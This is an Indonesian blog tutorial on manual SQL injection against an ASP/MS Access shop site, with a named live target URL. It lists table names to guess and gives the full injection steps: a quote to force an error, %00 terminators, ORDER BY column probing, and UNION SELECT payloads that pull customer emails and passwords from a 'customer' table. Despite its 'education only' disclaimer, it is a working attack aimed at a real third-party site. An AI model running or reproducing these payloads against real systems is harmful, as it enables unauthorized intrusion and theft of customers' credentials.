Beranda
Postingan

MSSQL ACCESS Injection (Manual)


Hai Kawan Bagaimana Kabarnya Pastinya baik-baik saja ya saya akan share lagi nih bagaimana cara melakukan MSSQL ACCESS Injection Secara Manual. Jadi kita menebak akses from, Serta Cara Melakukan MSSQL ACCESS :D ,,, Dan Ini hanya Untuk Edukasi Saja Oke... :D


Oke Kita Ke Topiknya Saja ya,,, Cara Melakukan MSSQL ACCESS Injection ;


Aplikasi & (Serta Live Target Pembelajaran)

1. Browser (Chrome/FireFox,dll)

2. DH Hackbar, Untuk Link Download Click Me.

3. Jadi Cara Ini Kita Hanya Perlu Menebaknya Saya akan Kasih Live Target Agar kalian Mudah & Paham...


Live Target : https://www.nwoc.com/shop/item.asp?itemid=743


Untuk Menebak Table From nya :

account accnts user_id members usrs usr2 account accounts admin admins administrator adminlogin adminweb auth authincate authincation access article articles book customer customers conf config login logut member memberid members member_id pwd pwrd pass password passwd store setting settings username user_name uname usernm user_password user_pwd user_passwd msysobjects

Oke Tanpa Basa Basi Mari Kita Langsung Cara Melakukannya;

Pertana Yang kalian Buka Adalah Aplikasi DH Hackbarnya Terlebih Dahulu, Lalu Kalian Klik Execute.
Nah Kalau Sudah Kalian Bisa Cek Tambahin '
Seperti Ini Bro;

Maka Akan Muncul Error Seperti Di Bawah Ini.
Nahh Jika Error Seperti Itu Tandanta Vuln MSSQL ACCESS,,, Nahh Bagaimana Cara Normal Kembali & Cara Melakukannya???

Sebelumnya Untuk URL Balancernya Jangan Menggunakan --+-,,, Harus Menggunakan %00

Oke Caranya Begini Broh;


Maka Website Tersebut Sudah Mormal Kembali. Langkah Selanjutnya Kita Akan Melakukan 
https://www.nwoc.com/shop/item.asp?itemid=743 order by 1%00

Nahh Lalu Angka Yang Order By Lalu Angka 1 nya kalian Rubah Dst. Sampai Webnya Eror

Dan Kebetulan Webnya Error Di Angka 42 Broh.
Jadi Untuk Melakukan Union seLect Itu Di Angka 41,,, Nah Jadi di bagian Union seLect Ini Kita Akan Menebak Table From Jadi Sudah Saya Sediakan Di Atas.

Oke Saya akan Menebaknya from customer

Contoh Seperti Ini;


https://www.nwoc.com/shop/item.asp?itemid=743 AND 0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from customer%00

Nanti akan Muncul Angka Togelnya :D
Setelah Muncul Togelnya, Langkah Selanjutnya Adalah Kita akan Melakukan penebakan Lagi...

Oke saya akan Menebak email & password,,, Untuk Cara Melakukannya U/P Seperti Ini;

https://www.nwoc.com/shop/item.asp?itemid=743 AND 0 UNION SELECT 1,email,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from customer%00

Maka Kita Akan Menemukan Email & Password Pada Tabel Website Tersebut.

Jadi Yang Angka 2 Adalah Emailnya & Angka 3 Adalah Passwordnya.... :D

Oke Segitu Saja Penjelasan Saya Bila Kurang Jelas Mohon Maaf,,, Oke Ini Hanya Edukasi Saja...

Terima Kasih.... Bye Bye :D


Posting Komentar